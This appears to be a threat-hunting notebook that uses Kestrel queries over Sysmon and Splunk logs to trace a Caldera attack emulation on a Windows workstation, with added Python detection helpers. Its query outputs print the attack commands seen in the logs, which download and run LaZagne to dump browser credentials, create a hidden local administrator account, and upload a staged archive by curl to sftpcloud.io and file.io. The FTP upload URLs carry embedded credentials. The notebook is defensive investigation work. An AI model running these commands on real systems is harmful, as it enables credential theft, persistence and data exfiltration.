## Context

### 10.0.0.5
- **OS**: Windows 10
- **Type**: Employee workstation
- **Enabled services**:
  - Windows Remote Desktop and remote management
- **Data source**:
  - [Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) -> [Splunk Enterprise](https://www.splunk.com/en_us/products/splunk-enterprise.html)
  - The data source is accessed through [stix-shifter](https://github.com/opencybersecurityalliance/stix-shifter)
  - Partial data extracted for this demonstration
- **stix-shifter profile name**: `splunk`

### 10.0.0.4
- **OS**: Ubuntu 24.04 LTS
- **Type**: Caldera command server

### 192.168.1.4
- **OS**: Fedora 38
- **Type**: SIEM for log collection
- **Enabled services**:
  - stix-shifter
  - stix2 Python Library
  - taxii2client Python Library
  - Arango TAXII Server
  - ArangoDB Community Edition
  - Kestrel
  - Jupyter

## Where to start?

What about the TTPs specified in [MITRE](https://mitre.org) [CALDERA](https://caldera.mitre.org/)?

![Caldera Image](./CalderaImage.png)

In [9]:
```kestrel
# TTP: System Network Configuration Discovery (T1016)
t1016_instances = GET process
                  FROM stixshifter://splunk
                  WHERE name = 'cmd.exe' AND (command_line LIKE '%netsh%' OR command_line LIKE '%ipconfig%' OR command_line LIKE '%arp%')
                  START 2024-12-01T00:00:00Z STOP 2024-12-24T00:00:00Z

DISP t1016_instances ATTR pid, name, command_line
```

```text
pid,name,command_line
9636,cmd.exe,cmd.exe /C ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config
9416,cmd.exe,"""C:\Windows\system32\cmd.exe"" /c ""C:\Users\inf808\AppData\Local\inf808\SharpShares.exe"" /ldap:all"

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,process*,user-account*,x-oca-asset*,x-oca-event*,x-splunk-data*
t1016_instances,process,2,12,144,144,432,286,144,144,144,144
```

The second row is a substring false positive: `LIKE '%arp%'` also matches the path of `SharpShares.exe`, so `arp` should be matched as a separate word rather than as a bare substring.


In [10]:
```kestrel
# TTP: Discover antivirus programs (T1518.001)
# CALDERA command on Windows: `wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value`
t1518_instances = GET process
                  FROM stixshifter://splunk
                  WHERE command_line LIKE '%AntiVirusProduct%'
                  START 2024-12-01T00:00:00Z STOP 2024-12-24T00:00:00Z

DISP t1518_instances ATTR pid, name, command_line
```

```text
pid,name,command_line
3132,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value"""
11532,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$NameSpace = Get-WmiObject -Namespace \""root\"" -Class \""__Namespace\"" | Select Name | Out-String -Stream | Select-String \""SecurityCenter\"";\$SecurityCenter = \$NameSpace | Select-Object -First 1;Get-WmiObject -Namespace \""root\\$SecurityCenter\"" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;"""
10180,WMIC.exe,"""C:\Windows\System32\Wbem\WMIC.exe"" /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value"

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,process*,user-account*,x-oca-asset*,x-oca-event*,x-splunk-data*
t1518_instances,process,3,8,8,8,22,11,8,8,8,8
```


In [222]:
```kestrel
nt = GET network-traffic
     FROM stixshifter://splunk
     WHERE dst_ref.value NOT LIKE '10.%' AND dst_port = '443' AND network-traffic:protocols[*] = 'ip'
     LAST 15 DAYS

# this command should return an interactive map with IPs pinned on the map
APPLY docker://pinip ON nt
```

```text
VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
nt,network-traffic,15,914,8480,4917,444,16261,5346,1060,3121,11544,8471,40,8480,8480,216,8480
```


In [214]:
```kestrel
nt = GET network-traffic
     FROM stixshifter://splunk
     WHERE dst_ref.value NOT LIKE '10.%' AND dst_port = '443' AND network-traffic:protocols[*] = 'ip'
     LAST 15 DAYS

# A domain name lookup analytics:
# a new attribute "x_domain_name" is added to the input variable for its dest IPs
APPLY docker://domainnamelookup ON nt
# x_domain_name and x_domain_organization are new attributes added by the analytics; show the new fields
DISP nt ATTR src_ref.value, src_port, dst_ref.value, dst_port, x_domain_name, x_domain_organization

ips = FIND ipv4-addr LINKED nt WHERE value != '10.0.0.5'

# the added WHERE clause limits the search to the endpoint 'WindowsTarget'
procs = FIND process CREATED nt
        WHERE x-oca-asset:hostname = 'WindowsTarget'
DISP procs ATTR x_original_file_name, command_line

users = FIND user-account OWNED procs
DISP users ATTR user_id

# find malicious executable files
files = FIND file LINKED procs
DISP files ATTR name, parent_directory_ref.path
```

```text
src_ref.value,src_port,dst_ref.value,dst_port,x_domain_name,x_domain_organization
10.0.0.5,54045,140.82.114.3,443,lb-140-82-114-3-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54046,185.199.111.133,443,cdn-185-199-111-133.github.com,"GitHub, Inc"
10.0.0.5,54701,185.199.111.154,443,cdn-185-199-111-154.github.com,"GitHub, Inc"
10.0.0.5,54915,140.82.114.3,443,lb-140-82-114-3-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54268,140.82.114.4,443,lb-140-82-114-4-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54697,140.82.112.4,443,lb-140-82-112-4-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54702,185.199.111.154,443,cdn-185-199-111-154.github.com,"GitHub, Inc"
10.0.0.5,54851,140.82.114.3,443,lb-140-82-114-3-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54734,140.82.112.4,443,lb-140-82-112-4-iad.github.com,"GitHub, Inc. (GITHU)"
10.0.0.5,54493,140.82.112.4,443,lb-140-82-112-4-iad.github.com,"GitHub, Inc. (GITHU)"

x_original_file_name,command_line
PowerShell.EXE,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"""
PowerShell.EXE,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";Invoke-WebRequest \""https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe\"" -OutFile \""\$StageDir\LaZagne.exe\"";cmd /c \""\$StageDir\LaZagne.exe browsers > \""\$StageDir\T1555003LaZagne_output.txt\""\"""""
PowerShell.EXE,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";Invoke-WebRequest \""https://github.com/mitchmoser/SharpShares/releases/download/v2.4/SharpShares.exe\"" -OutFile \""\$StageDir\SharpShares.exe\"";cmd /c `\""\$StageDir\SharpShares.exe`\"" /ldap:all | out-file -filepath \""\$StageDir\T1135SharpSharesOutput.txt\"""""

name,parent_directory_ref.path
powershell.exe,
powershell.exe,C:\Windows\System32\WindowsPowerShell\v1.0
Syscall.exe,
__PSScriptPolicyTest_zkwcrvyn.awj.ps1,
explorer.exe,
LaZagne.exe,
__PSScriptPolicyTest_nbbosa4w.b2j.ps1,
splunkd.exe,
SharpShares.exe,
__PSScriptPolicyTest_fiwdnd5r.xzv.ps1,

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
nt,network-traffic,15,816,6338,3385,382,11772,4718,929,2763,8467,6338,25,6338,6338,90,6338
ips,ipv4-addr,6,831,6338,3385,382,11772,4712,929,2778,8467,6338,25,6338,6338,90,6338
procs,process,4,2016,29967,22383,670,67416,11702,1469,6792,45685,29967,205,29967,29967,414,29967
users,user-account,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
files,file,11,22969,30383,22783,686,68573,11702,1517,6808,46457,30383,205,30383,30383,414,30383
```


### Investigation Context: Suspicious Command-Line Activity

During the investigation we identified suspicious command-line activity in the process data that was analyzed. The following details highlight the processes with potentially malicious or unauthorized actions.

#### Analytical Insights

- The **cmd.exe** command is highly suspicious, as it directly manipulates system user accounts and group memberships. The command line indicates an attempt to create a new user (`Alex`) with the password `coucou`, and then add the user to the `administrators` group. This is a clear indicator of an attacker creating a **local admin user** for **persistence** on the compromised system.

In [42]:
```kestrel
# A suspicious process scoring analytics.
# Calculates a "suspicious score" for processes based on activity types (e.g., writing to the system directory, network connections, forking processes, and suspicious commands), to help prioritize investigations by ranking processes in Kestrel.
# a new attribute "x_suspiciousness" is added to the input variable
procs = GET process FROM stixshifter://splunk
WHERE [process:binary_ref.name MATCHES '.+\.(exe|dll|bat)$' AND process:binary_ref.name != 'powershell.exe'] START t'2024-12-01T00:00:00Z' STOP t'2024-12-24T00:00:00Z'

APPLY docker://susp_scoring ON procs

# sort the processes
procs_desc = SORT procs BY x_suspicious_score DESC
# get the most suspicious ones
procs_sus = GET process FROM procs WHERE x_suspicious_score > 0.9
DISP procs_sus ATTR name, command_line, x_suspicious_score
```

```text
name,command_line,x_suspicious_score
cmd.exe,"cmd.exe /C net user /add ""Alex"" ""coucou"" && net localgroup administrators ""Alex"" /add",2
whoami.exe,"""C:\Windows\system32\whoami.exe""",1

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
procs,process,325,20678,22117,17379,294,50914,7168,453,4025,33858,22117,180,22117,22117,396,22117
procs_desc,process,325,20678,0,0,0,0,0,0,0,0,0,0,0,0,0,0
procs_sus,process,2,76,0,0,0,0,0,0,0,0,0,0,0,0,0,0
```

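As an added example (not the notebook's code and not the `docker://susp_scoring` analytics it applies), here is a scoring function in the shape of a Kestrel Python analytics that attaches `x_suspicious_score` and the matched TTP ids to each process record, using indicators for the hunts in this notebook (T1016 and T1518.001 above, account creation and archive staging below). The weights, patterns and sample records are assumptions constructed from the command lines shown on this page.

```python
import re

# (ttp_id, description, weight, pattern): weights and patterns are this
# example's assumptions, built from command lines seen in this notebook;
# they are not the rule set inside docker://susp_scoring.
INDICATORS = [
    ("T1016", "network configuration discovery", 1.0,
     re.compile(r"\b(?:ipconfig|netsh|arp|nbtstat)\b", re.I)),
    ("T1518.001", "security software discovery", 1.0,
     re.compile(r"AntiVirusProduct|SecurityCenter2", re.I)),
    ("T1033", "user discovery (whoami)", 0.5,
     re.compile(r"\bwhoami(?:\.exe)?\b", re.I)),
    ("T1136.001", "local account creation", 2.0,
     re.compile(r"\bnet\s+user\b.*\s/add\b", re.I)),
    ("T1098", "account added to administrators group", 2.0,
     re.compile(r"\bnet\s+localgroup\s+administrators\b", re.I)),
    ("T1560.001", "password-protected 7-Zip archive", 1.5,
     re.compile(r"\b7z(?:\.exe)?\W+a\s.*-p", re.I)),
]


def score_process(record):
    """Enrich one process record with x_suspicious_score and x_matched_ttps."""
    cmd = record.get("command_line") or ""
    hits = [(ttp, w) for ttp, _d, w, rx in INDICATORS if rx.search(cmd)]
    out = dict(record)
    out["x_matched_ttps"] = [ttp for ttp, _w in hits]
    out["x_suspicious_score"] = round(sum(w for _t, w in hits), 2)
    return out


def analytics(records):
    """Entry point shaped like a Kestrel Python analytics: enrich every record
    (a real Kestrel analytics receives and returns a pandas DataFrame)."""
    return [score_process(r) for r in records]


def top_suspicious(records, threshold=0.9):
    """Mirror of 'SORT ... DESC' followed by 'WHERE x_suspicious_score > 0.9'."""
    scored = [r for r in analytics(records) if r["x_suspicious_score"] > threshold]
    return sorted(scored, key=lambda r: r["x_suspicious_score"], reverse=True)


# Constructed sample records, copied from command lines shown in this notebook.
SAMPLE = [
    {"pid": 9636, "name": "cmd.exe", "command_line":
     "cmd.exe /C ipconfig /all && netsh interface show interface && arp -a && nbtstat -n && net config"},
    {"pid": 10180, "name": "WMIC.exe", "command_line":
     r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value'},
    {"pid": 1, "name": "cmd.exe", "command_line":
     'cmd.exe /C net user /add "Alex" "coucou" && net localgroup administrators "Alex" /add'},
    {"pid": 2, "name": "whoami.exe", "command_line": r'"C:\Windows\system32\whoami.exe"'},
    {"pid": 1304, "name": "7z.exe", "command_line":
     r'"C:\Program Files\7-Zip\7z.exe" a C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z C:\Users\inf808\AppData\Local\inf808\* "-p password"'},
    {"pid": 3, "name": "explorer.exe", "command_line": r"C:\Windows\explorer.exe"},
]
```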

In [221]:
```kestrel
users = GET user-account
FROM stixshifter://splunk
WHERE (user_id != "SYSTEM" AND user_id != "inf808" AND user_id != "WDAGUtilityAccount" AND user_id != "DefaultAccount" AND user_id != "Guest")
START 2024-12-01T15:05:00Z STOP 2024-12-24T08:00:00Z
DISP users ATTR account_login, user_id, id
```

```text
account_login,user_id,id
,WindowsTarget\$,user-account--33ef3d36-6196-5d15-98e0-21f30495198e
,administrator,user-account--363f010b-1538-5356-915b-6bfee164d94f
,Alex,user-account--75f957b2-1c87-55dc-be2d-a8c656b61cff
'S-1-5-18',NETWORK SERVICE,user-account--cf862b07-072e-51d7-ada6-d1b5b424bd80

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
users,user-account,4,1756,28583,21260,432,63483,11128,750,6151,43095,28570,220,28583,28583,636,28583
```


### Caldera Simulation: Downloading Malicious Tools from GitHub

In our Caldera simulation, commands were executed through PowerShell to download malicious tools from GitHub. The `Invoke-WebRequest` cmdlet fetched the malicious executable (`SharpShares.exe`), which was saved in a hidden directory at `C:\Users\$username\AppData\Local\$username`, where `$username` is the current user's name. Once downloaded, the tool was executed and its output redirected to a file (`T1135SharpSharesOutput.txt`) for exfiltration.

### Traffic Analysis

As part of the analysis, a time-series chart of web traffic was generated and shows a notable spike in outbound traffic at a specific time. The spike coincides with the period in which the malicious tool was downloaded, which indicates that the malicious activity occurred at that time. The chart visually supports the hypothesis that the tool was fetched from an external source and data was exfiltrated through the network, in line with the observed traffic anomaly.

In [223]:
```kestrel
conns_all = GET network-traffic
     FROM stixshifter://splunk
     WHERE dst_ref.value NOT LIKE '10.%' AND dst_port = '443' AND network-traffic:protocols[*] = 'ip'
     LAST 15 DAYS

# conns_all are network-traffic entities without timestamps. Get records of them with timestamps.
# More info: https://kestrel.readthedocs.io/en/latest/language.html#timestamped
conns_ts = TIMESTAMPED(conns_all)

APPLY python://attribute-plot ON conns_ts WITH XPARAM=first_observed, YPARAM=id
```

```text
VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
conns_all,network-traffic,15,929,8495,4917,444,16276,5376,1060,3136,11559,8486,40,8495,8495,216,8495
conns_ts,network-traffic,929,76895,0,0,0,0,0,0,0,0,0,0,0,0,0,0
```

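Added example, not part of the original notebook: the spike check that the `attribute-plot` chart lets an analyst eyeball, computed over the `first_observed` values of timestamped connection records. The timestamps are constructed to mimic `TIMESTAMPED(conns_all)` output, and the hourly bucketing and 3-sigma threshold are this example's assumptions.

```python
from collections import Counter
from datetime import datetime, timedelta
from statistics import mean, pstdev

TS_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"  # first_observed format in the Kestrel output above


def hourly_counts(first_observed):
    """Count records per UTC hour, filling empty hours with 0 so a quiet
    baseline is not hidden by missing buckets."""
    counts = Counter()
    for ts in first_observed:
        dt = datetime.strptime(ts, TS_FMT)
        counts[dt.replace(minute=0, second=0, microsecond=0)] += 1
    if counts:
        hour, last = min(counts), max(counts)
        while hour <= last:
            counts.setdefault(hour, 0)
            hour += timedelta(hours=1)
    return dict(sorted(counts.items()))


def find_spikes(first_observed, k=3.0):
    """Return (hour, count) for hours whose connection count exceeds
    mean + k * population stdev over all hours in the window."""
    counts = hourly_counts(first_observed)
    if len(counts) < 2:
        return []
    values = list(counts.values())
    mu, sigma = mean(values), pstdev(values)
    if sigma == 0:
        return []
    return [(h.strftime("%Y-%m-%dT%H:00:00Z"), c)
            for h, c in counts.items() if c > mu + k * sigma]


def constructed_timestamps():
    """Constructed stand-in for TIMESTAMPED(conns_all): two outbound HTTPS
    connections per hour on 2024-12-12, with a burst of 40 at 17:00 UTC."""
    base = datetime(2024, 12, 12)
    out = []
    for hour in range(24):
        for minute in range(40 if hour == 17 else 2):
            out.append((base + timedelta(hours=hour, minutes=minute)).strftime(TS_FMT))
    return out
```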

In [224]:
```kestrel
# Fetch processes from the last 10 days where the command line contains 'StageDir'
procs_exfil = GET process FROM "stixshifter://splunk" WHERE command_line LIKE '%StageDir%' LAST 10 DAYS

DISP procs_exfil ATTR pid, command_line

# Find parent processes of the processes in procs_exfil
parent_procs_exfil = FIND process CREATED procs_exfil

# Group parent processes by their name and display them
# The result here is the Sandcat agent executable file for the C2 channel with the Caldera server.
# Next, we will investigate further along the kill chain, focusing on the stages leading up to the exfiltration destination.
aggr = GROUP parent_procs_exfil BY name
DISP aggr ATTR unique_name, unique_pid, unique_command_line

# Find network-traffic associated with processes in procs_exfil
nt_exfil = FIND network-traffic CREATED BY procs_exfil

nt_exfil_ts = TIMESTAMPED(nt_exfil)

DISP nt_exfil_ts ATTR protocols, src_ref.value, src_port, dst_ref.value, dst_port

# Bar plot showing traffic direction for the malicious download of files from GitHub
APPLY python://attribute-plot ON nt_exfil_ts WITH XPARAM=x_direction
```

```text
pid,command_line
11972,"powershell.exe -ExecutionPolicy Bypass -C ""remove-item \""\$StageDir\T1135SharpSharesOutput.txt\"" -force -erroraction silentlycontinue"""
2400,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";& \""C:\Program Files\7-Zip\7z.exe\"" a \""\$StageDir\StagedFiles.7z\"" \""\$StageDir\*\"" \""-p password\"" | Out-Null;sleep 1;ls \""\$StageDir\StagedFiles.7z\"" | foreach {\$_.FullName} | select"""
10624,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";Invoke-WebRequest \""https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe\"" -OutFile \""\$StageDir\LaZagne.exe\"";cmd /c \""\$StageDir\LaZagne.exe browsers > \""\$StageDir\T1555003LaZagne_output.txt\""\"""""
8836,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";Invoke-WebRequest \""https://github.com/mitchmoser/SharpShares/releases/download/v2.4/SharpShares.exe\"" -OutFile \""\$StageDir\SharpShares.exe\"";cmd /c `\""\$StageDir\SharpShares.exe`\"" /ldap:all | out-file -filepath \""\$StageDir\T1135SharpSharesOutput.txt\"""""

name,unique_pid,unique_name,unique_binary_ref,unique_x_unique_id,unique_command_line,unique_parent_ref,unique_x_original_file_name,mean_x_suspicious_score,mean_cluster,unique_x_psd_deobfuscated
splunkd.exe,1,1,2,1,1,0,0,0.0,0.0,0

protocols,src_ref.value,src_port,dst_ref.value,dst_port
"[""ip"",""tcp""]",10.0.0.5,54269,185.199.111.133,443
"[""ip"",""tcp""]",10.0.0.5,54268,140.82.114.4,443
"[""ip"",""tcp""]",10.0.0.5,54494,185.199.108.133,443
"[""ip"",""tcp""]",10.0.0.5,54493,140.82.112.4,443

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
procs_exfil,process,4,2249,32535,24293,752,73027,12380,1664,7198,49506,32526,220,32535,32535,540,32535
parent_procs_exfil,process,22,3311,32335,24421,752,73083,11724,1664,6870,49416,32326,220,32335,32335,540,32335
aggr,process,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0
nt_exfil,network-traffic,4,480,8516,4930,448,16317,5384,1070,3155,11587,8507,40,8516,8516,216,8516
nt_exfil_ts,network-traffic,480,57616,0,0,0,0,0,0,0,0,0,0,0,0,0,0
```


### Pre-Stage Phase Related to Data Exfiltration

During the staging phase that precedes data exfiltration, we simulated the creation of a staging directory at the path `C:\Users\inf808\AppData\Local\staged_files` and placed multiple dumps of credential files there. Once ready, the data was packaged (e.g., compressed into a `.7z` archive) and exfiltrated using two distinct methods:
- **File transfer protocols (sftpcloud.io)**
- **Cloud storage (file.io)**

In [191]:
```kestrel
exfil_cmd = GET process FROM stixshifter://splunk
WHERE command_line LIKE '%StagedFiles.7z%'
LAST 15 DAYS
# display the timestamps from observations of those processes
DISP TIMESTAMPED(exfil_cmd) ATTR pid, name, command_line
```

```text
first_observed,pid,name,command_line
2024-12-12T16:43:24.000Z,10504,curl.exe,"""C:\Windows\System32\curl.exe"" -T C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z ftp://534c18bc0cab45b996304dc32ffbf4cf:nwg22fYoW5qE9ZApcEYZWU6pmJ1Q8OHh@eu-central-1.sftpcloud.io"
2024-12-12T16:43:24.000Z,3320,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$zipFilePath = \""C:\Users\\$username\AppData\Local\\$username\StagedFiles.7z\"";& \""C:\Windows\System32\curl.exe\"" -T \""\$zipFilePath\"" \""ftp://534c18bc0cab45b996304dc32ffbf4cf:nwg22fYoW5qE9ZApcEYZWU6pmJ1Q8OHh@eu-central-1.sftpcloud.io\"";Start-Sleep -Seconds 2;"""
2024-12-12T17:01:24.000Z,1304,7z.exe,"""C:\Program Files\7-Zip\7z.exe"" a C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z C:\Users\inf808\AppData\Local\inf808\* ""-p password"""
2024-12-12T17:01:24.000Z,2400,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$StageDir = \""C:\Users\\$username\AppData\Local\\$username\"";& \""C:\Program Files\7-Zip\7z.exe\"" a \""\$StageDir\StagedFiles.7z\"" \""\$StageDir\*\"" \""-p password\"" | Out-Null;sleep 1;ls \""\$StageDir\StagedFiles.7z\"" | foreach {\$_.FullName} | select"""
2024-12-12T17:02:15.000Z,2688,cmd.exe,"cmd.exe /C set username=%%USERNAME%%cd /d C:\Users\%%username%%\AppData\Local\%%username%%C:\Windows\System32\Curl.exe -k -F ""file=@StagedFiles.7z"" https://file.io/"
2024-12-12T17:03:01.000Z,6764,curl.exe,"""C:\Windows\System32\curl.exe"" -T C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z ftp://d9ed88e510ee4b82a05af32f15e571a5:v9Nbr0klPEwzie09OGLYZoAj2C4hYTUn@eu-central-1.sftpcloud.io"
2024-12-12T17:03:01.000Z,2692,powershell.exe,"powershell.exe -ExecutionPolicy Bypass -C ""\$username = \$env:USERNAME;\$zipFilePath = \""C:\Users\\$username\AppData\Local\\$username\StagedFiles.7z\"";& \""C:\Windows\System32\curl.exe\"" -T \""\$zipFilePath\"" \""ftp://d9ed88e510ee4b82a05af32f15e571a5:v9Nbr0klPEwzie09OGLYZoAj2C4hYTUn@eu-central-1.sftpcloud.io\"";Start-Sleep -Seconds 2;"""
2024-12-12T17:03:03.000Z,6764,curl.exe,"""C:\Windows\System32\curl.exe"" -T C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z ftp://d9ed88e510ee4b82a05af32f15e571a5:v9Nbr0klPEwzie09OGLYZoAj2C4hYTUn@eu-central-1.sftpcloud.io"

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*,x-splunk-authentication*,x-splunk-data*
exfil_cmd,process,7,1085,28529,22564,634,66346,8558,1365,5173,44431,28529,205,28529,28529,414,28529
```

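Added example (not the notebook's code and not part of Kestrel) for triaging the upload commands the hunt above surfaced: it recognises the two curl upload forms seen here (`-T` to an FTP endpoint, `-F file=@` to file.io), extracts the destination, and strips URL-embedded credentials so the finding can go into a report without leaking them. The command lines are constructed from this page with the credential tokens replaced by placeholders.

```python
import re
from urllib.parse import urlsplit, urlunsplit

URL_RE = re.compile(r"(?:ftp|ftps|sftp|https?)://[^\s\"']+", re.I)
CURL_RE = re.compile(r"\bcurl(?:\.exe)?\W", re.I)


def parse_upload(command_line):
    """Return None unless the command is a curl upload; otherwise describe the
    destination with any credentials embedded in the URL removed."""
    if not CURL_RE.search(command_line):
        return None
    if re.search(r"\s-T\s", command_line):
        mode = "file upload (-T)"
    elif re.search(r"\s-F\s+\"?file=@", command_line):
        mode = "multipart form upload (-F file=@)"
    else:
        return None
    url = URL_RE.search(command_line)
    if not url:
        return None
    # trailing quote/backslash residue from PowerShell-escaped command lines
    parts = urlsplit(url.group(0).rstrip('\\"\';'))
    has_creds = parts.username is not None
    netloc = f"[REDACTED]@{parts.hostname}" if has_creds else parts.netloc
    return {
        "mode": mode,
        "scheme": parts.scheme.lower(),
        "host": parts.hostname,
        "credentials_in_url": has_creds,
        "insecure_tls": bool(re.search(r"\s-k\s", command_line)),  # curl -k
        "destination": urlunsplit((parts.scheme, netloc, parts.path, parts.query, "")),
    }


def exfil_report(command_lines):
    """(mode, redacted destination, risk flags) per upload command; safe to paste."""
    rows = []
    for cmd in command_lines:
        info = parse_upload(cmd)
        if info:
            flags = [k for k in ("credentials_in_url", "insecure_tls") if info[k]]
            rows.append((info["mode"], info["destination"], flags))
    return rows


# Constructed from the command lines on this page; USERTOKEN/PASSTOKEN are placeholders.
SAMPLE_COMMANDS = [
    r'"C:\Windows\System32\curl.exe" -T C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z ftp://USERTOKEN:PASSTOKEN@eu-central-1.sftpcloud.io',
    r'powershell.exe -ExecutionPolicy Bypass -C "$zipFilePath = ""C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z"";& ""C:\Windows\System32\curl.exe"" -T ""$zipFilePath"" ""ftp://USERTOKEN:PASSTOKEN@eu-central-1.sftpcloud.io"";Start-Sleep -Seconds 2;"',
    r'cmd.exe /C cd /d C:\Users\inf808\AppData\Local\inf808 && C:\Windows\System32\Curl.exe -k -F "file=@StagedFiles.7z" https://file.io/',
    r'"C:\Program Files\7-Zip\7z.exe" a C:\Users\inf808\AppData\Local\inf808\StagedFiles.7z C:\Users\inf808\AppData\Local\inf808\* "-p password"',
]
```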